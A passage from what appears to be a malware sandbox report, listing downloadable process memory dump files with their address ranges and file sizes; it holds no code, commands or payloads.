memory/1888-265-0x00000000001E0000-0x000000000020A000-memory.dmp

Filesize
168KB

Download
memory/1956-78-0x0000000000000000-mapping.dmp

Download
memory/1960-130-0x0000000076B70000-0x0000000076C8F000-memory.dmp

Filesize
1.1MB

Download
memory/1960-129-0x0000000076D90000-0x0000000076F39000-memory.dmp

Filesize
1.7MB

Download
memory/1960-126-0x000007FEEE1B0000-0x000007FEEEBD3000-memory.dmp

Filesize
10.1MB

Download
memory/1960-142-0x0000000076D90000-0x0000000076F39000-memory.dmp

Filesize
1.7MB

Download
memory/1960-141-0x000000000125B000-0x000000000127A000-memory.dmp

Filesize
124KB

Download
memory/1960-137-0x0000000001254000-0x0000000001257000-memory.dmp

Filesize
12KB

Download
memory/1960-119-0x0000000000000000-mapping.dmp

Download
memory/1960-136-0x0000000076D90000-0x0000000076F39000-memory.dmp

Filesize
1.7MB

Download
memory/1960-134-0x000000000125B000-0x000000000127A000-memory.dmp

Filesize
124KB

Download
memory/1960-128-0x0000000001254000-0x0000000001257000-memory.dmp

Filesize
12KB

Download
memory/1960-139-0x0000000076B70000-0x0000000076C8F000-memory.dmp

Filesize
1.1MB

Download
memory/1960-127-0x000007FEED650000-0x000007FEEE1AD000-memory.dmp

Filesize
11.4MB

Download
memory/1964-74-0x0000000000000000-mapping.dmp

Download
memory/1984-151-0x0000000000000000-mapping.dmp

Download
memory/1996-68-0x0000000000000000-mapping.dmp

Download
memory/1996-433-0x0000000000000000-mapping.dmp

Download
memory/2012-92-0x0000000000000000-mapping.dmp

Download
memory/2016-275-0x0000000000000000-mapping.dmp

Download
memory/2016-329-0x0000000000240000-0x000000000026A000-memory.dmp

Filesize
168KB

Download
memory/2016-339-0x00000000003D0000-0x00000000003FA000-memory.dmp

Filesize
168KB

Download